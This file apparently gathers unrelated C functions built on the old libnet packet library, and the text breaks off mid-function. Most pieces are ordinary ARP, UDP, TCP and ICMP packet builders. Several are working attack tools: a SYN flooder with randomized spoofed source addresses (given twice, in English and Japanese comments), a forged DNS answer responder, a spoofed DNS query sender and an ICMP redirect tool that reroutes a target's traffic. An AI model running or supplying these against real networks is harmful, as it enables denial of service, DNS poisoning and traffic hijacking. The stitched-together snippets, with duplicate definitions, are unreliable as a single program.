int send_tcp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_short src_prt, u_long dst_ip, u_short dst_prt) { int n; u_char *buf; if (libnet_init_packet(LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H, &buf) == -1) { perror("no packet memory"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf); libnet_build_ip(LIBNET_TCP_H, 0, 242, 0, 64, IPPROTO_TCP, src_ip, dst_ip, NULL, 0, buf + LIBNET_ETH_H); libnet_build_tcp(src_prt, dst_prt, 111111, 999999, TH_SYN, 32767, 0, NULL, 0, buf + LIBNET_IP_H + LIBNET_ETH_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H); n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H); if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H) { fprintf(stderr, "Oopz. Only wrote %d bytes\n", n); } else { printf("Wrote %d byte TCP packet through linktype %d\n", n, l->linktype); } libnet_destroy_packet(&buf); return (n); }
int init(void) { /* Ethernet header */ etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */ memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */ memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */ /* IP header */ memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address 0.0.0.0 * (pretend to be proxy to * avoid being elected as master) */ inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst); /* IP destination address */ iphdr.ip_tos = 0; /* IP type of services */ iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */ iphdr.ip_p = IPPROTO_IGMP; /* IP protocol IGMP */ iphdr.ip_off = 0; /* IP fragmentation offset */ iphdr.ip_ttl = 1; /* IP TTL - set to 1 purposely */ /* IGMP header */ igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY; /* IGMP type */ igmphdr.igmp_code = 0; /* IGMP code */ inet_aton(MCAST_MDNS, &igmphdr.igmp_group); /* IGMP group address */ /* Create packet */ linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf); if (linkint == NULL) { return -1; } igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H; if (libnet_init_packet(igmp_packetlen, &pkt) == -1) { return -1; } libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off, iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr, NULL, 0, pkt + LIBNET_ETH_H); libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code, igmphdr.igmp_group.s_addr, NULL, 0, pkt + LIBNET_ETH_H + LIBNET_IP_H); libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H); }
int send_arp(struct link_int *l, u_long ip, u_char *device) { int n; u_char *buf; if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf); /* * ARP header */ libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src, (u_char *)&ip, enet_dst, (u_char *)&ip, NULL, 0, buf + ETH_H); n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H); fprintf(stderr, "."); libnet_destroy_packet(&buf); return (n); }
int send_arp(struct libnet_link_int *l, u_char *device) { int n; u_char *buf; if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf); /* * ARP header */ libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src, ip_src, enet_dst, ip_dst, NULL, 0, buf + LIBNET_ETH_H); n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H); printf("Wrote %d byte ARP packet through linktype %d\n", n, l->linktype); libnet_destroy_packet(&buf); return (n); }
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd, FileData *ipod, char *device) { int n; u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0; static u_int8_t *pkt; static int sockfd = -1; struct libnet_link_int *l2 = NULL; u_int8_t link_offset = 0; #if !defined(WIN32) int sockbuff = IP_MAXPACKET; #endif if (pd->file_mem == NULL) pd->file_s = 0; if (ipod->file_mem == NULL) ipod->file_s = 0; if (got_link) /* data link layer transport */ { if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL) { nemesis_device_failure(INJECTION_LINK, (const char *)device); return -1; } link_offset = LIBNET_ETH_H; } else { if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0) { nemesis_device_failure(INJECTION_RAW, (const char *)NULL); return -1; } #if !defined(WIN32) if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff, sizeof(sockbuff))) < 0) { fprintf(stderr, "ERROR: setsockopt() failed.\n"); return -1; } #endif } udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s + ipod->file_s; udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H); #ifdef DEBUG printf("DEBUG: UDP packet length %u.\n", udp_packetlen); printf("DEBUG: IP options size %u.\n", ipod->file_s); printf("DEBUG: UDP payload size %u.\n", pd->file_s); #endif if (libnet_init_packet(udp_packetlen, &pkt) == -1) { fprintf(stderr, "ERROR: Unable to allocate packet memory.\n"); return -1; } if (got_link) libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off, ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr, NULL, 0, pkt + link_offset); libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem, pd->file_s, pkt + link_offset + LIBNET_IP_H); if (got_ipoptions) { if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem, ipod->file_s, pkt + link_offset)) == -1) { fprintf(stderr, "ERROR: Unable to add IP options, discarding " "them.\n"); } } if (got_link) libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H + ipod->file_s); libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H + pd->file_s + ipod->file_s); if (got_link) n = libnet_write_link_layer(l2, device, pkt, udp_packetlen); else n = libnet_write_ip(sockfd, pkt, udp_packetlen); if (verbose == 2) nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE); if (verbose == 3) nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE); if (n != udp_packetlen) { fprintf(stderr, "ERROR: Incomplete packet injection. Only wrote " "%d bytes.\n", n); } else { if (verbose) { if (got_link) printf("Wrote %d byte UDP packet through linktype %s.\n", n, nemesis_lookup_linktype(l2->linktype)); else printf("Wrote %d byte UDP packet.\n", n); } } libnet_destroy_packet(&pkt); if (got_link) libnet_close_link_interface(l2); else libnet_close_raw_sock(sockfd); return n; }
int send_arp(struct libnet_link_int *l, u_int32_t ip, u_char *device, u_char *macaddr, u_char *broadcast, u_char *netmask, u_short arptype) { int n; u_char *buf; u_char *target_mac; u_char device_mac[6]; u_char bcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; u_char zero_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1) { cl_log(LOG_ERR, "libnet_init_packet memory:"); return -1; } /* Convert ASCII Mac Address to 6 Hex Digits. */ /* Ethernet header */ if (get_hw_addr((char*)device, device_mac) < 0) { cl_log(LOG_ERR, "Cannot find mac address for %s", device); return -1; } if (libnet_build_ethernet(bcast_mac, device_mac, ETHERTYPE_ARP, NULL, 0 , buf) == -1) { cl_log(LOG_ERR, "libnet_build_ethernet failed:"); libnet_destroy_packet(&buf); return -1; } if (arptype == ARPOP_REQUEST) { target_mac = zero_mac; } else if (arptype == ARPOP_REPLY) { target_mac = macaddr; } else { cl_log(LOG_ERR, "unkonwn arptype:"); return -1; } /* * ARP header */ if (libnet_build_arp(ARPHRD_ETHER, /* Hardware address type */ ETHERTYPE_IP, /* Protocol address type */ 6, /* Hardware address length */ 4, /* Protocol address length */ arptype, /* ARP operation */ macaddr, /* Source hardware addr */ (u_char *)&ip, /* Target hardware addr */ target_mac, /* Destination hw addr */ (u_char *)&ip, /* Target protocol address */ NULL, /* Payload */ 0, /* Payload length */ buf + LIBNET_ETH_H) == -1) { cl_log(LOG_ERR, "libnet_build_arp failed:"); libnet_destroy_packet(&buf); return -1; } n = libnet_write_link_layer(l, (char*)device, buf, LIBNET_ARP_H + LIBNET_ETH_H); if (n == -1) { cl_log(LOG_ERR, "libnet_build_ethernet failed:"); } libnet_destroy_packet(&buf); return (n); }
int main(int argc, char *argv[]) { int packet_size, /* size of our packet */ payload_size, /* size of our packet */ c; /* misc */ u_long src_ip, dst_ip; /* source ip, dest ip */ u_short bport, eport; /* beginning and end ports */ u_short cport; /* current port */ u_char payload[MAX_PAYLOAD_SIZE]; /* packet payload */ u_char *packet; /* pointer to our packet buffer */ char err_buf[LIBNET_ERRBUF_SIZE]; /* error buffer */ u_char *device; /* pointer to the device to use */ struct libnet_link_int *network; /* pointer to link interface struct */ struct libnet_plist_chain plist; /* plist chain */ struct libnet_plist_chain *plist_p; /* plist chain pointer */ printf("libnet example code:\tmodule 4\n\n"); printf("packet injection interface:\tlink layer\n"); printf("packet type:\t\t\tUDP [with payload] using port list chaining\n"); plist_p = NULL; device = NULL; src_ip = 0; dst_ip = 0; while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", optarg); } break; case 'i': device = optarg; break; case 's': if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n", optarg); } break; case 'p': plist_p = &plist; if (libnet_plist_chain_new(&plist_p, optarg) == -1) { libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n"); } break; default: usage(argv[0]); exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip || !plist_p) { usage(argv[0]); exit(EXIT_FAILURE); } c = argc - optind; if (c != 1) { usage(argv[0]); exit(EXIT_FAILURE); } memset(payload, 0, sizeof(payload)); strncpy(payload, argv[optind], strlen(argv[optind])); /* * Step 1: Network Initialization (interchangable with step 2). */ if (device == NULL) { struct sockaddr_in sin; /* * Try to locate a device. */ if (libnet_select_device(&sin, &device, err_buf) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf); } printf("device:\t\t\t\t%s\n", device); } if ((network = libnet_open_link_interface(device, err_buf)) == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf); } /* * Get the payload from the user. Hrm. This might fail on a Sparc * if byte alignment is off... */ payload_size = strlen(payload); /* * We're going to build a UDP packet with a payload using the * link-layer API, so this time we need memory for a ethernet header * as well as memory for the ICMP and IP headers and our payload. */ packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size; /* * Step 2: Memory Initialization (interchangable with step 1). */ if (libnet_init_packet(packet_size, &packet) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); } /* * Step 3: Packet construction (ethernet header). */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, packet); /* * Step 3: Packet construction (IP header). */ libnet_build_ip(LIBNET_UDP_H + payload_size, 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_UDP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, packet + LIBNET_ETH_H); /* Packet header memory */ while (libnet_plist_chain_next_pair(plist_p, &bport, &eport)) { while (!(bport > eport) && bport != 0) { cport = bport++; /* * Step 3: Packet construction (UDP header). */ libnet_build_udp(242, /* source port */ cport, /* dest. port */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_ETH_H + LIBNET_IP_H); /* * Step 4: Packet checksums (ICMP header *AND* IP header). */ if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } /* * Step 5: Packet injection. */ c = libnet_write_link_layer(network, device, packet, packet_size); if (c < packet_size) { libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c); } else { printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport); } } } /* * Shut down the interface. */ if (libnet_close_link_interface(network) == -1) { libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface"); } /* * Free packet memory. */ libnet_destroy_packet(&packet); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // allocate memory for packet if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length packet); // packet header memory libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // urgent pointer NULL, // payload (none) 0, // payload length packet + LIBNET_IP_H); // packet header memory if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // inject packet if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy_packet(&packet); // free packet memory if (libnet_close_raw_sock(network) == -1) // close the network interface libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 6) { printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"; payload_size = 21; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 0, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ 33, /* payload length */ packet + LIBNET_IP_H); /* * dns header construction */ libnet_build_dns(id, /* dns id */ 0x0100, /* control flags */ 1, /* number of questions */ 0, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); /* * we're done with this packet */ libnet_destroy_packet(&packet); /* * we're done writing */ if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char **argv) { int sockfd, c; u_char *buf; u_long src, dst, gateway; if (argc < 4) { fprintf(stderr, "usage: %s <old_router> <target> <new_gateway>\n", argv[0]); exit(EXIT_FAILURE); } if (!(src = libnet_name_resolve(argv[1], 1))) { perror("Error resolving source host"); exit(EXIT_FAILURE); } if (!(dst = libnet_name_resolve(argv[2], 1))) { perror("Error resolving destination host"); exit(EXIT_FAILURE); } if (!(gateway = libnet_name_resolve(argv[3], 1))) { perror("Error resolving gateway host"); exit(EXIT_FAILURE); } if (libnet_init_packet(IP_MAXPACKET, &buf) == -1) { perror("Couldn't allocate memory for header"); exit(EXIT_FAILURE); } if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("Couldn't open raw socket"); exit(EXIT_FAILURE); } libnet_build_ip(LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT, 242, 0, 48, IPPROTO_ICMP, src, dst, NULL, 0, buf); libnet_build_icmp_redirect( ICMP_REDIRECT, ICMP_UNREACH_HOST, gateway, 0, /* just an ip header */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */ 424, /* IP ID */ 0, /* Frag stuff */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ dst, /* Source IP */ src, /* Destination IP */ NULL, /* pointer to payload */ 0, /* size of payload */ buf + LIBNET_IP_H); /* packet header memory */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H); c = libnet_write_ip(sockfd, buf, LIBNET_ICMP_REDIRECT_H + 2 * LIBNET_IP_H); if (c != LIBNET_ICMP_REDIRECT_H + 2 * LIBNET_IP_H) { fprintf(stderr, "Error writing to socket, only wrote %d bytes\n", c); exit(EXIT_FAILURE); } printf("Completed, wrote %d bytes\n", c); libnet_destroy_packet(&buf); exit(EXIT_SUCCESS); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト dest_port = (u_short) atoi(argv[2]); // ポート番号 network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // 乱数生成器に種を与える printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // 永久ループ(CTRL-Cで終了されるまで) { libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化) 0, // 断片化 libnet_get_prand(LIBNET_PR8), // TTL (乱数化) IPPROTO_TCP, // トランスポートプロトコル libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化) dest_ip, // 宛先IP NULL, // ペイロード(なし) 0, // ペイロード長 packet); // パケットヘッダメモリ libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化) dest_port, // 宛先TCPポート libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化) libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化) TH_SYN, // コントロールフラグ (SYNフラグのみ設定) libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化) 0, // 至急ポインタ NULL, // ペイロード (なし) 0, // ペイロード長 packet + LIBNET_IP_H); // パケットヘッダメモリ if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する } libnet_destroy_packet(&packet); // パケットメモリを解放する if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int send_icmp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_long dst_ip) { int n; u_char *buf; if (libnet_init_packet(LIBNET_ICMP_MASK_H + LIBNET_IP_H + LIBNET_ETH_H, &buf) == -1) { perror("no packet memory"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf); libnet_build_ip(LIBNET_ICMP_MASK_H, 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, buf + LIBNET_ETH_H); /* Packet header memory */ libnet_build_icmp_mask(ICMP_MASKREPLY, /* type */ 0, /* code */ 242, /* id */ 0, /* seq */ 0xffffffff, /* mask */ NULL, /* payload */ 0, /* payload_s */ buf + LIBNET_ETH_H + LIBNET_IP_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_ICMP, LIBNET_ICMP_MASK_H); printf("Packet as it will appear on the wire (give or take some byte ordering):"); libnet_hex_dump(buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H, 0, stdout); printf("\n"); n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H); if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H) { fprintf(stderr, "Oopz. Only wrote %d bytes\n", n); } else { printf("Wrote %d byte ICMP packet through linktype %d\n", n, l->linktype); } libnet_destroy_packet(&buf); return (n); }
/****************************************************************************** * spoof_dns * * * * check some conditions, build the actual packet, and write the answer * * arg1: (int) socket to write on * * ret: none * ******************************************************************************/ void spoof_dns (int socket) { struct in_addr src, dst; /* used for printing addresses */ int written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ i; /* misc */ u_char *packet; /* we build this */ /* * check the following conditions before spoofing * if any of these conditions are violated then no spoofing is done * - we only want to spoof packets from a nameserver * - we only want to spoof packets from questions of type A * - we only want to spoof packets if we have an answer */ if (ntohs(chewycenter.dst_port) != 53) { if (!sflag) { printf("\nignoring packet: destination not a nameserver"); printf("\n--"); } return; } if (!chewycenter.is_a) { if (!sflag) { printf("\nignoring packet: question is not of type A"); printf("\n--"); } return; } if (!chewycenter.have_answer) { if (!sflag) { printf("\nignoring packet: no answer for this question"); printf("\n--"); } return; } /* * if we're here it means we're ready to spoof an answer, lets reflect that * in the spoofed answers count */ num_spoofed_answers++; /* * packet memory allocation */ packet_size = chewycenter.payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); return; } /* * ip header construction * source and destination are swapped here because we are spoofing a reply */ libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 0, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ chewycenter.dst_address, /* source address */ chewycenter.src_address, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * source and destination ports are swapped here too * * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * although, from what i know, it really shouldn't be here */ libnet_build_udp(53, /* source port */ ntohs(chewycenter.src_port), /* destination port */ NULL, /* payload */ chewycenter.payload_size + 12, /* payload length */ packet + LIBNET_IP_H); /* * dns header construction */ libnet_build_dns(ntohs(chewycenter.dns_id), /* dns id */ 0x8580, /* control flags (QR,AA,RD,RA) */ 1, /* number of questions */ 1, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ chewycenter.payload, /* payload */ chewycenter.payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) { printf("\nwarning: "); libnet_error(LN_ERR_WARNING, "libnet only wrote %d of %d bytes", written_bytes, packet_size); printf("\n--"); } /* * we're done with this packet */ libnet_destroy_packet(&packet); /* * announce what we've just done * remember that we've swapped the addresses/ports */ src.s_addr = chewycenter.src_address; dst.s_addr = chewycenter.dst_address; printf("\nspoofing answer: %s:%d > ", inet_ntoa(dst), ntohs(chewycenter.dst_port)); printf("%s:%d", inet_ntoa(src), ntohs(chewycenter.src_port)); printf("\t[%s = %s]", chewycenter.current_question, chewycenter.current_answer); #if defined DEBUG printf("\nDEBUG>\n payload: [%d]", chewycenter.payload_size); for (i = 0; i < 52; i++) printf("%x ", chewycenter.payload[i]); printf("\n"); #endif printf("\n--"); if (oflag) { } }
int main(int argc, char *argv[]) { // packet type (arp/udp/tcp) char type[5]; // network device char *device = "eth0\0"; struct libnet_link_int *link; // Raw socket int sock; // error buffer char errbuff[LIBNET_ERRBUF_SIZE]; // src and dst mac u_char dmac[6],smac[6]; // src and dst ip unsigned int src_ip, dst_ip; // packet buffer unsigned char *packet; // packet payload char *payload; // payload size int p_size; // bytes send over the wire int send; // check parameter if(argc == 1) { printf("Usage: %s <arp/udp/tcp>\n",argv[0]); exit(0); } else { strcpy(type,argv[1]); } // Allocate memory for the payload payload = malloc(50); // Packets payload strcpy(payload,"TEST LIBNET\0"); packet = NULL; // payload size p_size = strlen(payload); // mac address strcpy(smac,SMAC); strcpy(dmac,DMAC); // ip address in network byte order src_ip = inet_addr(SOURCE); dst_ip = inet_addr(DEST); // Lookup ip addresses src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0); dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0); // Build an ARP packet? if(!strcmp(type,"arp")) { // open the network device link = libnet_open_link_interface(device,errbuff); // Failed? if(link == NULL) { printf("Error while opening device %s!\n%s\n",device,errbuff); exit(1); } printf("Using device %s\n",device); // Allocate memory for the packet if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } if(packet == NULL) { printf("libnet_init_packet error!\n"); exit(1); } // Build ethernet header libnet_build_ethernet(dmac, // destination mac smac, // source mac 